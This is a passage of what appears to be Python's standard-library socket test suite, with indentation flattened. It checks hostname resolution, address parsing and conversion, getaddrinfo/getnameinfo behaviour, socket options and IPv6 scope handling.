socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
        if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on these platforms, as there is an
# assumption-breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
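# For instance, on most systems socket.getservbyname('domain', 'tcp') is 53
# and socket.getservbyport(53, 'tcp') is 'domain'; the loop above simply picks
# whichever of the candidate services is present in the local services database.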
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
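# As a concrete example of the mapping exercised above,
# socket.inet_aton('192.0.2.1') == socket.inet_pton(socket.AF_INET, '192.0.2.1')
# == b'\xc0\x00\x02\x01', i.e. one network-order byte per dotted-quad component.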
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
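# For well-formed input inet_ntop() is the inverse of inet_pton(); e.g.
# socket.inet_ntop(socket.AF_INET6,
#                  socket.inet_pton(socket.AF_INET6, '2001:db8::1'))
# returns the canonical compressed form '2001:db8::1'.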
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# A freshly created socket should have SO_REUSEADDR (reuse) off, i.e. == 0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple of times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
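# Each getaddrinfo() result is a 5-tuple (family, type, proto, canonname,
# sockaddr); for IPv4/TCP the sockaddr looks like ('127.0.0.1', 80), which is
# what the length and filter checks above rely on.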
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note that the interface name part is missing from the returned IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note that the interface name part is missing from the returned IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
